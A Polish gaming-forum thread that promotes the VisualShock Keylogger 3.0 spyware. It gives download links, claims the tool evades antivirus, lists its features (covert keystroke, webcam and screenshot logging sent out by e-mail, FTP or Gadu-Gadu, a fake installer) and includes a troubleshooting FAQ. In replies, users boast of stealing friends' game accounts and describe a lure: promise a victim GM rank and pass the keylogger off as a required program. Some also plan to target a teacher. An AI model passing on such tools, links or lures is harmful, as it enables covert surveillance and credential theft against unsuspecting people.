Sign in to follow this  
Followers 0
Helghast

VisualShock Keylogger 3.0

20 posts in this topic

Dobra wedlug mnie zajebisty program-hack dzieki ktoremu mozemy robic wiele czynnosci

np.wpierdolic sie na konto GM na serwer xD

Keylogger - typ programów komputerowych służących do wykradania haseł.

Programy te działają na zasadzie przejęcia kontroli nad procedurami systemu operacyjnego (głównie Microsoft Windows) służącymi do obsługi klawiatury. Każde wciśnięcie klawisza jest odnotywowane w specjalnym pliku. Opcjonalnie informacje o wciśniętych klawiszach poszerzone są o dodatkowe informacje, jak nazwa aktywnego programu lub okna.

Keyloggery zawierają funkcje chroniące je przed wykryciem przez niedoświadczonego użytkownika komputera, a plik w którym zapisywane są dane ukryty jest np. w katalogach systemowych. Dzięki temu długo mogą rezydować niewykryte na komputerze ofiary i przyczyniać się do ujawnienia wszystkich wykorzystywanych haseł. Większość keyloggerów ma spejalnie stworzoną funkcję ,która pozwala na wysłanie pliku z hasłami na wyznaczony adres pocztowy.

Keyloggery sprzętowe mają postać małych przejściówek służących do wpięcia do portu klawiatury komputera. Klawiaturę wpina się następnie do gniazda w przejściówce, która potem zapisuje wszystkie wciskane klawisze we wbudowanej pamięci lub wysyła je drogą radiową. W przypadku keyloggerów pierwszego typu konieczny jest fizyczny dostęp do urządzenia dla odczytania danych. Można również spotkać keylogger sprzętowy wbudowany w klawiaturę lub przewód łączący klawiaturę z komputerem.

VisualShock Keylogger 3.0-najlepszy jak na razie nie wykrywalny przez AV

Download:

http://www.gigasize.com/get.php/420328/vsk30.rar

Spolszczenie:

http://www.gigasize.com/get.php/420339/polski.rar

to co ten program mniej wiecej potrafi:

[+] video cam

[+] wysyłanie logów o określonej godzinie, dniu tygodnia

[+] wysyłanie logów co określony czas[+] przeglądanie plików

[+] kasowanie plików,katalogów

[+] przesyłanie plików

--- via ftp

--- via e-mail

[+] zrzuty ekranowe

--- via gadu-gadu

--- via ftp

--- via e-mail

[+] czyszczenie systemu (logów, zrzutów ekranowych, nagrań dźwięków) bez kasowania w systemie serwera

[ ] dostęp do wiersza poleceń ofiary

[ ] logi tekstu i hasła z każdej aplikacji, nawet z popularnych komunikatorów takich jak AOL/AIM/Yahoo/ICQ/Skaype

[ ] zapisywanie wszystkich naciskanych klawiszy

[ ] Keylogger będzie monitorował aplikacje odbierające wciśnięcia klawiszy!

[+] Bardzo dokładnie określenia czasu kiedy nastąpiło wciśnięcie klawisza!

[ ] Monitorowanie schowka systemowego

[ ] przesyłanie logów, i starych logów znajdujących się w systemie

--- via ftp

--- via e-mail

[ ] zapisywanie haseł logowanie w 9x/ME

[ ] Monitoruje maszyny z większą ilością użytkowników

[ ] zapisywanie logów kiedy komputer jest offline

[ ] szybkie drukowanie logów dzięki twojej przeglądarce internetowej

[ ] kasowanie logów i starych logów znajdujących się w systemie

[ ] nagrywanie dźwięków otoczenia

--- via ftp

--- via e-mail

[ ] zdalne wyłączenie serwera z systemu ofiary

[ ] zdalne usuwanie serwera z systemu ofiary

[ ] symulacja instalatora

[ ] błąd instalacyjny

[ ] opcja niepozwalająca wyłączyć komputera ofiary

[ ] deinstalacja o określonej dacie

[ ] Update - VisualShock Keylogger potrafi sprawdzać czy są już aktualizacje, może je automatycznie pobrać i zainstalować. Najnowsza wersja keyloggera będzie zawsze zainstalowana na Twoim komputerze

[ ] Automatyczny start (aut. uruchamianie)

[ ] Support dla Windows 98/NT/2000/XP

[ ] Przyjazny interfejs

[ ] ÂŁatwy do instalacji

Legenda

[ ] - bez zmian

[+] - dodano

[x] - usunięto

[p] - planowane w następniej wersji

FaQ

Najczęściej zadawane pytania odnośnie VisualShock Keyloggera.

1. Czym jest wersja VIP? I dlaczego pobierana jest za nią opłata?

Wersja VIP, to wersja nie wykrywalna przez oprogramowanie antywirusowe. Płacisz dlatego ponieważ autor programu musi go całkowicie przepisać specjalnie dla Ciebie, co zabiera jego prywatny czas.

2. Jak długo czeka się na wersje VIP?

Na wersję VIP-owską czeka się od 2 dni do tygodnia. To zależy od czasu autora. Czas oczekiwania może się wydłużyć np. Z powodu wielu zamówień na wersje VIP.

3. Czemu jak uruchamiam wygenerowany serwer on nie działa?

Przyczyną mogą być:

- zła konfiguracja serwera.

- serwer nie kożystający z opcji połączenia z Gadu-Gadu, taki serwer przesyła logi co określony czas lub co określone dni o wybranych porach, dlatego może wydawać się że serwer nie działa.

- masz już uruchomionego keyloggera na swoim komputerze, wtedy należy usunąć go osobnym deinstalatorem. Po takim zabegu możesz wygenerować serwer który będzie działał, oczywiście pod warunkiem że będzie poprawnie skonfigurowany.

4. Dlaczego serwer nie połączył się z siecią Gadu-Gadu?

- zła konfiguracja serwera, numerów gadu-gadu.

- serwer z jakiegoś wzgledu nie może połaczyć się z siecią gg.

- serwer nie został uruchomiony.

5. Dlaczego wyskakuje mi komunikat przy połaczeniu gadu-gadu "Wystąpił błąd podczas przesyłania pliku!".

Przyczyną mogą być:

- zła konfiguracja zakładek "Połączenie poczty","Połączenie ftp".

- keylogger nie może połaczyć się z serwerem poczty, bądz FTP.

- plik przesyłany jest za duży, większy od pojemności FTP, bądz wielkości przesyłanego maila.

- inne przyczyny.. zależne od serwerów Emial, FTP.

6. Po uruchomieniu serwra zablokował mi się alt+ctrl+del, deinstalator nie przywrócił mi menadzera zadań jak go przywrócić?

1. Start > uruchom > i wpisz regedit

2. Znajdz klucz:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

3. W tym kluczu znajdz wartosc: DisableTaskMgr i ją skasuj, menadzer zadań zostanie włączony.

7. Jak usunąć VSK 3 z swojego komputera?

Uruchamiamy konfigurator wybieramy jedną z opcji np. "z połaczeniem gadu-gadu" przechodzimy do zakładki Deinstalacja > Osobny Deinstalator i klikamy na przycisk "Wygeneruj". Gdy zostanie wygenerowany plik deinstalator.exe uruchamiamy go. Gdy mamy na swoim komputerze uruchomonego keyloggera deinstalator powinien wykryć go, gdy klikniemy na napis "Wykryto!" deinstalator usunie program z systemu.

8. Jak wyłączyć serwer nie usuwając go z systemu?

Gdy serwer kożysta z połaczenia gadu-gadu można wpisać komendę #kill, spowoduje to wyłaczenie serwera do następnego restartu komputera.

Hahaha raz dajesz tu a raz dajesz w mroczne pomysły :p ale najlepiej to tu bo po co jakis dziad ma wiedzieć takie rzeczy :D

ja to wylorzystam

to ma wirusa wiec wylaczyc Av debile

n/c

po 1 nikt sie na to nie skarzyl bo to jest oczywiste ...

po 2 nie wiem jak ty sie odyzywasz do ludzi ale ja na pewno nie jestem ta osoba co napisales powyzej wiec trocha szaczunku ... jestem przekonany ze matka cie troche nauczyla kontaktow miedzy - ludzkich a jak nie to ja popros o kilka lekcji ...

denerwuje mnie takie zachowania a zwlaszcza w zakonie ...

a pierdoli mnie co ty myslisz!

jak nie chcesz czytac przeklenstw nie czytaj nie zmuszam

to jest moje slownictwo i codziennie go uzywam

przeklinanie dla mnie to nic powaznego

i co z tego ze w zakonie takie slowa sa?

Dzieki za programik, wlasnie mi sie przydal :P :D Co do keyloggerów to znacie inny program generujacu owy shit :? : Bo tego to kazdy AV wykrywa :/

Wlasnie hacknalem kumplowi konto w tibii :D

Napisz poradnik jak shackowac konto w Tibi ]

ten program nie sluzy do Tibi tylko.

ten prog wysyla ci pakiety na mail w ktorym wiesz co koles wklepywal na klawierce oraz mozesz sobie ustawic screenshota co sek ze mu robi

sa inne chcesz?

Oczywiscie ze chce !! Ten VSK3.0 jest troche ograniczony, nie mozna go dopisac do procesu wybranego np. zeby wysylal logi tylko z procesu tibia.exe :P Bo takie wysylanie loga z tego co sie pisze to spam xD

Helghast zapodaj jak znasz inny programik moze bardziej rozbudowany :P Moze byc nawet trial bo serial/crack to se znajde xD

OFF(wlasnie spadl mi nie wiadomo skad wielki pajak na sciane :/ Zem sie wystraszyl :lol: )

ten program nie sluzy do Tibi tylko.

ten prog wysyla ci pakiety na mail w ktorym wiesz co koles wklepywal na klawierce oraz mozesz sobie ustawic screenshota co sek ze mu robi

O k.rwa kogo Ty uczysz xD

Nie ucz ojca dzieci robic ! :P

Dorbze wiem jak dziala keylogger ;P

Dokladnie :P

Przyklad jak namowic nooba do wziecia keya ;D

Bo wiesz nie chce mi sie chrzanic przez porty exploity i potem trojanem wbic mu na hama..

to zbyt nuzace xD

Obiecujesz kolesiowi GM'a na swoim OTS'ie, zapewniasz go ze go dostanie. Mowisz ze aby grac na Twoim OTS'ie potrzebny jest program (i wtedy dajesz mu keyloggera) do uruchomienia OTS'a, on go odpala i po sprawie :D

Nooby sie na to nabieraja ja tak wrobilem 2 kumpli z klasy (ktorych nielubie). Juz maja czyste depo ;-)

haha hackerzy

ja chcialem to wykorzystac zeby znac passy Gma do Wowa

xD

i na informatyce naszemu nauczycielowi planuje xD

dzis dam nastepny keylogger xD

tylko nie wiem czy jest lepszy xD

Sign in to follow this  
Followers 0